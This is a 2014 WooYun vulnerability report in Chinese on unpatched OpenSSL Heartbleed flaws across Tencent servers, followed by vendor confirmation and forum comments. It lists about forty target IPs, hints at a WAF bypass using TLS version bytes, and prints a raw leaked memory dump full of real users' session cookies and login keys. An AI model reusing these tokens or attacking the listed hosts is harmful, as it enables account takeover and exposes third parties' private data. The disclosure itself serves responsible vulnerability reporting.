当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057996

漏洞标题:腾讯大量openssl心脏出血漏洞依旧未修复可导致数据泄漏

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2014-04-21 22:32

修复时间:2014-06-05 22:33

公开时间:2014-06-05 22:33

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-21: 细节已通知厂商并且等待厂商处理中
2014-04-22: 厂商已经确认,细节仅向厂商公开
2014-05-02: 细节向核心白帽子及相关领域专家公开
2014-05-12: 细节向普通白帽子公开
2014-05-22: 细节向实习白帽子公开
2014-06-05: 细节向公众公开

简要描述:

腾讯大量openssl心脏出血漏洞依旧未修复可导致数据泄漏

详细说明:

# 描述
腾讯很多服务器的修复方式可能只是简单的通过WAF建立一个规则去拦截EXP,
而WAF规则可被绕过,或者说是规则不完整,没有拦截到特定版本的EXP。

version = []
version.append(['SSL 3.0','03 00'])
version.append(['TLS 1.0','03 01'])
version.append(['TLS 1.1','03 02'])
version.append(['TLS 1.2','03 03'])


# 受影响主机列表 (简单列举,就不列出更多了)

119.147.254.186
183.60.15.178	 
119.147.254.58	
113.108.70.177	
113.108.70.176	
113.105.73.156	
113.105.73.147	
113.105.73.136	
113.105.73.155	
183.60.217.26		
183.60.217.28	 
183.60.217.27	 
113.108.20.85	 
113.108.20.81	 
113.105.137.47	
113.105.137.48	
113.105.137.49	
183.62.104.190	
112.90.136.154	
101.227.130.120
163.177.153.29	
112.90.86.35	 
119.167.195.46	
119.167.195.63	
119.167.195.62	
120.33.50.134	 
120.33.50.135	 
120.198.189.53	
112.90.141.233	
112.90.141.232	
123.151.38.145	
123.151.38.144	
112.90.141.105	
117.135.130.154
183.60.7.169		
122.193.23.37	 
119.147.2.30	 
122.193.23.165	
183.60.11.176


漏洞证明:

# res.wx.qq.com 微信某服务器

weixin.jpg


# 泄露数据

IP:112.90.136.154:443
存在openssl 信息泄露: 
.@.y..ST.fF...k....3q.{....M^..EF.H... G..\.ff..d.t........n@6].........H.........9.8.......5.........E.D.f.3.2...........A...../..............................ssl.qq.com........................#...~..$4....pNm...WB..`.C.^.....@>R...FM.;....|W.y.p...!.9<RQ/<\R...X.f...erwx!.E..A.|.......=2.....|k...:2.tT.....^.6.^....P!.M.&...k......f84.XC...).f.j..q.v..&.q}.Fa=.....Q............/verify.qq.com/webkit/vip_roaming.html?isvip=1&param=634366009&version=5101&pgsrc=&lang=2052..Accept-Encoding: gzip,deflate..Accept-Language: zh-CN..Accept-Charset: *,utf-8..Cookie: pt2gguin=o0751084788; uin=o0751084788; skey=@xkzAIvMiY; ptisp=cnc; RK=6mHTNS3x/u; ptcz=26bd145a75b3d9fa27b1c275683d1a900b53aeefab942530ce3edf5c4accb19c; pgv_pvid=1733677092; pgv_info=ssid=s9199956824......u6..`5....Q]....].................5p.~......I..(`.8J...g..q....b.....2d17168adee3de235c.....d&+........k.fm.....].p..%.q.h..T.Y3..*.m.(.W.#.$|...).......ge."....W...r.jDT.d.Et..B5....' Y....A.v. ..~K...[.....rl=http%3A//reg.t.qq.com/index.php&proxy_url=http://t.qq.com/proxy_t.html&s_url=http%3A%2F%2Fsearch.t.qq.com%2Findex.php%3Fpos%3D201%26su%3D1%26smart%3D1%26k%3D%25E7%2583%2582%25E6%25B3%25A5%25E6%259D%2591%26p%3D1%26s_advanced%3D1%26s_hot%3D0%26s_time%3D20140322%252C20140421&daid=6..Accept: */*..Cookie: qq_slist_autoplay=on; lv_irt_id=7089bb8269ad8c988779fddfffa00d39; pgv_pvi=6604813312; mb_reg_from=8; wbilang_1158474972=zh_CN; wbilang_10000=zh_CN; pgv_si=s8605636608; RK=qrMSu2awdO; wbilang_2759862881=zh_CN; home_silentUserJump=1; wb_regf=%3B0%3B%3Bapi1.t.qq.com%3B0; wbilang_2093212376=zh_CN; wbilang_2093355831=zh_CN; wbilang_744427518=zh_CN; wbilang_1302065722=zh_CN; arp_scroll_position=192; ts_refer=search.t.qq.com/index.php; ptisp=ctc; luin=o2799097084; skey=@XH5IVaRt5; p_skey=eeNLcWDSdS5s6-IeCZI799DVCtqtqL3zB66EbBYcXQo_; p_lskey=00040000ddb02963e49272a18708b7bf2e2da8afee06953187be7a0eed1653aa77e2140274ca48d62d1e2a06; wbilang_2799097084=zh_CN; ts_last=search.t.qq.com/index.php; ts_uid=4073387960; pgv_info=ssid=s8761384970; pgv_pvid=4991519906; o_cookie=2799097084..Connection: Keep-Alive..Accept-Encoding: gzip..Accept-Language: en-US,*..Host: ssl.qq.com....ahz........=...*.:.D....1333198002.1397966077.1398045111.1398058479.4; __utmz=136017777.1397971599.2.2.utmcsr=v.qq.com|utmccn=(referral)|utmcmd=referral|utmcct=/cover/7/7qs9di1f8djdo9v.html; __utmv=136017777.|1=source=15043=1; v6uin=; uin_cookie=463683446; euin_cookie=EAD7EF2441E26E22BD8507727A0AE88205DE1F870D13F3E4; rv2=80E0624E17E9E9419116606CB95C2ED78520DEBDABE4B669D3; property20=D4BE1CCC7B42D5CCCA198543FE27FB2EACE88AC7A46D207B0D70CAC03E04138C753942B58B0BA624; qqmusic_uin=12345678; qqmusic_key=12345678; qqmusic_fromtag=6; pgv_info=ssid=s8373692000&pgvReferrer=; __utmc=136017777; uin=o1428184585; skey=@BA5nxF7m8; ptisp=cnc; pgv_si=s8450722816; uikey=16708e13b3ae824736dddb0d94f281ec331d269b3856f94d3357a8f5b1bd7d62.....Z.....*..{E.@.1.g.....2525252Fwww.manhuajun.com%2525252Findex.php%2525252Fauth%2525252Ftqqlogin%252526checkStatus%25253Dyes%252526appfrom%25253D%252526g_tk%25253D%252526sessionKey%25253Dafc8baaeca0a4b88bb8a78f3b9801cbf%252526checkType%25253DshowAuth%252526state%25253D&s_url=https%253A%252F%252Fopen.t.qq.com%252Fcgi-bin%252Foauth2%252Fauthorize%253Fclient_id%253D801254428%2526response_type%253Dcode%2526redirect_uri%253Dhttp%25253A%25252F%25252Fwww.manhuajun.com%25252Findex.php%25252Fauth%25252Ftqqlogin%2526checkStatus%253Dyes%2526appfrom%253D%2526g_tk%253D%2526sessionKey%253Dafc8baaeca0a4b88bb8a78f3b9801cbf%2526checkType%253DshowAuth%2526state%253D&mibao_css=&low_login=0&daid=6&style=13&authParamUrl=&needVip=0&ptui_version=10076..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3..Cookie: RK=P0we9NvuGr; pgv_pvi=1933447168; luin=o0037641586; lskey=0001000001da63a07e07f5fc7e43753ee3f9f2bddc7b7a5290bde79a97755d7fa726d2aba3fe3b2afbce20b0; ptui_loginuin=37641586; ptisp=cnc; ptcz=ba41ad1990748217425a03bbcb929633a98c42e84ebbdc634e754c2807726c55; pt2gguin=o0037641586; uin=o0037641586; skey=@dLC1CxImx; pgv_info=ssid=s5096782034; pgv_pvid=6473875254; o_cookie=37641586....<.u...j.d82N.............E5%25A4%25B4%25E6%259D%25A1%25E5%258D%259A%25E5%25AE%25A2%2529&regmaster=&enable_qlogin=&daid=&jiechi_version=10012..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3..Cookie: RK=BIpSNzhuv3; pgv_pvi=4598700032; pgv_pvid=3630292000; o_cookie=965190834; pt2gguin=o0965190834; ptcz=3fadc3b7516c31ec4c7f3e9234b947a278f4bdd3afd8525542991928578c14b2; pgv_si=s5681696768; ptui_identifier=000DEFA42103D10BA87486F467A740FDDEB23F90747D2BED107BE5A4......b....2YN.D.....&..........2A55So55qE56CW5pS%2525254055qE5pe26Ze06ZW%2525252A5LqGIOi%2525252AmOWPr%25252540S7peeUqOWQl%25252540%252525408n%25252540Wkp%25252540e6puaciTblubTku6XkuIrkuoYg6ICM5LiU5LiA55u05Zyo5aSW6Z2i5pS%25252540552A6aOO5ZC56Zuo5reL55qEpicIdStart%2525253DpicIdEnd%252526checkStatus%25253Dyes%252526appfrom%25253D%252526g_tk%25253D%252526sessionKey%25253D328288468a2a4315b83c25a3737d40f6%252526checkType%25253DshowAuth%252526state%25253D&s_url=https%253A%252F%252Fopen.t.qq.com%252Fcgi-bin%252Foauth2%252Fauthorize%253Fclient_id%253D801155390%2526response_type%253Dcode%2526redirect_uri%253Dhttp%25253A%25252F%25252Fwww.wenwo.com%25252F360%25252Fquesforward%25253Fkeywords%25253D55uW5oi%25252A55So55qE57qi56CW5pS%25254055qE5pe26Ze06ZW%25252A5LqGIOi%25252AmOWPr%252540S7peeUqOWQl%252540%2525408n%252540Wkp%252540e6puaciTblubTku6XkuIrkuoYg6ICM5LiU6L%252540Y5LiA55u05Zyo55uW5oi%25252A55So55qE56CW5pS%25254055qE5pe26Ze06ZW%25252A5LqGIOi%25252AmOWPr%252540S7peeUqOWQl%252540%2525408n%252540Wkp%252540e6puaciTblubTku6XkuIrkuoYg6ICM5LiU5LiA55u05Zyo5aSW6Z2i5pS%252540552A6aOO5ZC56Zuo5reL55qEpicIdStart%25253DpicIdEnd%2526checkStatus%253Dyes%2526appfrom%253D%2526g_tk%253D%2526sessionKey%253D328288468a2a4315b83c25a3737d40f6%2526checkType%253DshowAuth%2526state%253D&mibao_css=&low_login=0&daid=6&style=13&authParamUrl=&needVip=0&ptui_version=10076..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3..Cookie: pt2gguin=o0070516507; ptcz=eebf8f2073a23ffaa9d8455b7fa74b67f46bcebcab8d8741f6e81e72046fc363; ptui_loginuin=70516507; o_cookie=70516507; RK=vUfKhGJFUr; pgv_pvi=3368522752; pgv_pvid=2490007677......O.2.R"....O..f(.........3%2525E9%252587%25258D45%2525E6%252596%2525A4%2525280%252529&mibao_css=&low_login=0&style=14&authParamUrl=&needVip=1&ptui_version=10076..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3..Cookie: ptui_loginuin=7888577; RK=ksdWkZKw0L; pgv_pvi=4415442944; lv_irt_id=e4bfa04c0426e9f4fdd005ebcb2ec6b6; pgv_pvid=3351331936; o_cookie=7888577; pt2gguin=o0007888577; ptcz=4849156eb8959675154893351f52ae226dfc2683ffee89d5ca84fa481b294374; pgv_si=s5540185088; ptui_identifier=000DEFA42103D10BA87486F467A740FDDEB23F90747D2BED107BE5A4.......*P....f......z......2525E5%252581%25259A%2525E7%25259A%252584%2525E6%25259C%252589%2525E7%252582%2525B9%2525E5%252581%2525B7%2525E6%252587%252592%252520%2525E8%252580%25258C%2525E4%2525B8%252594%2525E5%2525BE%252588%2525E5%2525A4%25259A%2525E9%252583%2525BD%2525E6%252598%2525AF%2525E8%252580%252581%2525E7%2525B4%2525A0%2525E6%25259D%252590%252520%2525E6%25258A%2525B1%2525E6%2525AD%252589%2525E5%252595%2525A6%252520%25253D%252520%25253D%252520-_-!%252520%2525E6%25259C%252589%2525E4%2525BA%25259B%2525E5%25259C%2525B0%2525E6%252596%2525B9%2525E8%2525BF%252598%2525E6%25259C%252589%2525E9%252587%25258D%2525E9%25259F%2525B3%2525E7%25259A%252584%2525E5%25259C%2525B0%2525E6%252596%2525B9%252520%2525E7%252594%2525BB%2525E8%2525B4%2525A8%2525E4%2525B8%25258D%2525E6%2525B8%252585%2525E6%252599%2525B0%2525E7%25259A%252584%2525E5%25259C%2525B0%2525E6%252596%2525B9%252520%2525E6%25258A%2525B1%2525E6%2525AD%252589%2525E4%2525BA%252586%2525200%2525200%2526title%253D%2525E7%252589%2525B9%2525E6%252591%252584MV%2525EF%2525BC%25259A%2525E8%2525BF%25259B%2525E5%252587%2525BB%2525E7%25259A%252584%2525E5%2525A5%2525A5%2525E7%252589%2525B9%2525E6%25259B%2525BC%2526site%253D%2525E5%252593%252594%2525E5%252593%2525A9%2525E5%252593%252594%2525E5%252593%2525A9%2526pics%253Dhttp%25253A%25252F%25252Fi1.hdslb.com%25252Fu_user%25252F56b339aba3477c14f5bfd52a2d8c8073.jpg%2526style%253D203%2526width%253D98%2526height%253D22%2526otype%253Dshare%26regmaster%3D%26enable_qlogin%3D%26daid%3D%26jiechi_version%3D10012%7C_%7CMozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F30.0.1599.101%20Safari%2F537.36&v=0.7530368631705642 HTTP/1.1..Host: ssl.qq.com..Connection: keep-alive..Accept: image/webp,*/*;q=0.8..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36..Referer: https://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=15004501&param=u1%253Dhttp%25253A%25252F%25252Fsns.qzone.qq.com%25252Fcgi-bin%25252Fqzshare%25252Fcgi_qzshare_onekey%25253Furl%25253Dhttp%2525253A%2525252F%2525252Fwww.bilibili.tv%2525252Fvideo%2525252Fav1073105%2525252F%252526showcount%25253D1%252526desc%25253D%252525E7%25252589%252525B9%252525E6%25252591%25252584MV%252525EF%252525BC%2525259A%252525E8%252525BF%2525259B%252525E5%25252587%252525BB%252525E7%2525259A%25252584%252525E5%252525A5%252525A5%252525E7%25252589%252525B9%252525E6%2525259B%252525BC%25252520UP%252525E4%252525B8%252525BB%252525EF%252525BC%2525259Avs%252525E4%252525B8%252525A8%252525E4%252525B8%252525B6%252525E6%252525B2%25252589%252525E9%252525BB%25252598%252526summary%25253D%252525E8%25252587%252525AA%252525E5%25252588%252525B6MAD%25252520%252525E8%252525BF%25252599%252525E6%252525AC%252525A1%252525E5%25252581%2525259A%252525E7%2525259A%25252584%252525E6%2525259C%25252589%252525E7%25252582%252525B9%252525E5%25252581%252525B7%252525E6%25252587%25252592%25252520%252525E8%25252580%2525258C%252525E4%252525B8%25252594%252525E5%252525BE%25252588%252525E5%252525A4%2525259A%252525E9%25252583%252525BD%252525E6%25252598%252525AF%252525E8%25252580%25252581%252525E7%252525B4%252525A0%252525E6%2525259D%25252590%25252520%252525E6%2525258A%252525B1%252525E6%252525AD%25252589%252525E5%25252595%252525A6%25252520%2525253D%25252520%2525253D%25252520-_-!%25252520%252525E6%2525259C%25252589%252525E4%252525BA%2525259B%252525E5%2525259C%252525B0%252525E6%25252596%252525B9%252525E8%252525BF%25252598%252525E6%2525259C%25252589%252525E9%25252587%2525258D%252525E9%2525259F%252525B3%252525E7%2525259A%25252584%252525E5%2525259C%252525B0%252525E6%25252596%252525B9%25252520%252525E7%25252594%252525BB%252525E8%252525B4%252525A8%252525E4%252525B8%2525258D%252525E6%252525B8%25252585%252525E6%25252599%252525B0%252525E7%2525259A%25252584%252525E5%2525259C%252525B0%252525E6%25252596%252525B9%25252520%252525E6%2525258A%252525B1%252525E6%252525AD%25252589%252525E4%252525BA%25252586%252525200%2525252

修复方案:

你们最懂了

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-22 00:56

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

这些评论似乎很乌云~~~思密达
  1. 2014-04-21 22:41 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    过去这么长时间了竟然还存在未修复,还是腾讯的 真是惊呆了

  1. 2014-04-21 22:41 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    过去这么长时间了竟然还存在未修复,还是腾讯的 真是惊呆了

  2. 2014-04-21 22:44 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    卧槽,。。。神奇路人甲

  3. 2014-04-21 22:50 | zj1244 ( 普通白帽子 | Rank:273 漏洞数:33 | 小葵)

    神奇的路人甲

  4. 2014-04-21 22:55 | 金枪银矛小霸王 ( 普通白帽子 | Rank:103 漏洞数:25 | 不会挖洞洞的猿猿不是好学生)

    openssl...又来通宵了

  5. 2014-04-21 23:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    呵呵

  6. 2014-04-21 23:09 | 浮生若梦 ( 路人 | Rank:7 漏洞数:7 | 浮生若梦)

    哈哈,怕被查水表,成路人甲了。

  7. 2014-04-21 23:14 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    洞主是雷锋 我一眼就看出来了

  8. 2014-04-21 23:23 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    这么叼啊!

  9. 2014-04-22 00:54 | 死亡歌颂者 ( 路人 | Rank:2 漏洞数:3 | 关注互联网安全,树立文明网络平台.)

    路人甲 爆地漏洞 很好

  10. 2014-04-22 09:00 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    不应该啊

  11. 2014-04-22 11:16 | along ( 实习白帽子 | Rank:45 漏洞数:7 | 关注信息安全,阿龙)

    都这么久了,还有大量,晕啊

  12. 2014-04-22 14:39 | 摄影会长 ( 实习白帽子 | Rank:81 漏洞数:14 | 我是马甲!)

    某人一下子积分怎么多了20啊 哈哈

  13. 2014-04-22 14:48 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @摄影会长 呵呵

  14. 2014-04-22 16:06 | 摄影会长 ( 实习白帽子 | Rank:81 漏洞数:14 | 我是马甲!)

    @猪猪侠 呵呵 别误会 我现在是你粉丝

  15. 2014-04-25 15:35 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @猪猪侠 鄙视隐身

  16. 2014-04-25 16:10 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    周鸿祎:第一希望腾讯尽快修复漏洞,切实保护用户信息安全,第二360愿意向腾讯提供安全技术支持,如有需要,请尽快与我们联系。

  17. 2014-05-12 09:41 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    提醒:级别足够但是无法查看 Rank 高于自己的白帽子漏洞 ( 可以等待进一步公开或者支付 10 个乌云币提前查看 还是路人甲的级别高啊

  18. 2014-06-06 10:01 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    周鸿祎:第一希望腾讯尽快修复漏洞,切实保护用户信息安全,第二360愿意向腾讯提供安全技术支持,如有需要,请尽快与我们联系。